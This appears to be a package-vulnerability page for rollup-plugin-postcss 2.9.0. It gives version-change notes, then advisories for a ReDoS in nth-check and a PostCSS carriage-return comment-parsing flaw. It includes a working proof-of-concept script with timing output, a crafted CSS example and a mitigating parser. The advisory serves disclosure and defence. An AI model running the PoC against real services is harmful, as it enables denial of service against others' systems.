Rollup Plugin PostCSS streamlines the integration of PostCSS into your Rollup workflows, enabling you to process CSS files and apply PostCSS transformations within your JavaScript bundles. Version 2.9.0 is a slightly refined version of the previous stable release, 2.8.2. While the core functionality remains consistent, there are differences of note. The resolve dependency had a version change from 1.16.1 to 1.16.0. The rollup package has been updated from version 2.6.1 to 1.32.1. While on the surface it looks like a downgrade, version 2.6.1 was buggy. The dist section also shows differences, with version 2.9.0 having a smaller unpacked size than the earlier version.
Both versions provide a seamless development experience, allowing you to write modern CSS with features like autoprefixing, CSS Modules, and custom syntax using preprocessors like Sass, Less, and Stylus. The plugin handles the complexities of PostCSS configuration, letting you focus on styling your application. Dependencies like cssnano for CSS minification and postcss-modules for modular CSS are readily available. The plugin also includes robust source map support, making debugging a breeze. By leveraging Rollup Plugin PostCSS, developers can streamline their CSS processing, improve code maintainability, and stay up-to-date with the latest CSS features, all while staying within the familiar Rollup ecosystem.
All the vulnerabilities related to version 2.9.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a growing run of spaces and a trailing invalid character
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)
    }
    catch (err) {
        // parse() rejects the string; report how long the rejection took
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
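The mitigation side of the issue above, as an added example that is not nth-check's own code: a hand-written scanner for the same An+B grammar that walks the input once, so the whitespace-flooded "2n ... !" shape from the PoC is rejected in time linear in its length, plus a length bound applied before parsing untrusted selector text. The function names and the MAX_NTH_LENGTH value are choices made for this example, not library APIs or settings.

```javascript
// Added example, not nth-check's own code: a linear-time scanner for the An+B
// argument of :nth-child()-style selectors. Like nthCheck.parse() it returns
// [a, b], but it never backtracks. MAX_NTH_LENGTH is a bound chosen for this
// example, not a library setting.
const MAX_NTH_LENGTH = 64;

function scanNth(s) {
  s = s.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];
  let i = 0;
  const n = s.length;
  const skipSpaces = () => { while (i < n && " \t\n\r\f".includes(s[i])) i++; };
  const readSign = () => (s[i] === "-" ? (i++, -1) : s[i] === "+" ? (i++, 1) : 0);
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };
  let a = 0, b = 0;
  const sign = readSign() || 1;          // sign of the first term, if any
  const digits = readDigits();
  if (s[i] === "n") {                    // An term: "n", "-n", "2n"
    a = sign * (digits === "" ? 1 : Number(digits));
    i++;
    skipSpaces();
    if (i < n) {                         // optional "+ B" / "- B"
      const bSign = readSign();
      if (bSign === 0) throw new SyntaxError("expected '+' or '-' at " + i);
      skipSpaces();
      const bDigits = readDigits();
      if (bDigits === "") throw new SyntaxError("expected digits at " + i);
      b = bSign * Number(bDigits);
    }
  } else {                               // B only: "3", "+3"
    if (digits === "") throw new SyntaxError("expected a number or 'n'");
    b = sign * Number(digits);
  }
  if (i !== n) throw new SyntaxError("unexpected input at position " + i);
  return [a, b];
}

// Entry point for untrusted selector text: refuse oversized input before
// scanning at all; a real An+B expression is a handful of characters.
function parseNth(input) {
  if (typeof input !== "string") throw new TypeError("expected a string");
  if (input.length > MAX_NTH_LENGTH) throw new RangeError("nth expression too long");
  return scanNth(input);
}
console.log(parseNth("2n + 1"), parseNth("-n+3"), parseNth("odd")); // [2,1] [-1,3] [2,1]
```

The length bound is the cheap, general defence for any parser of attacker-controlled selector text; the scanner shows that the grammar itself does not need a backtracking regex.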
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.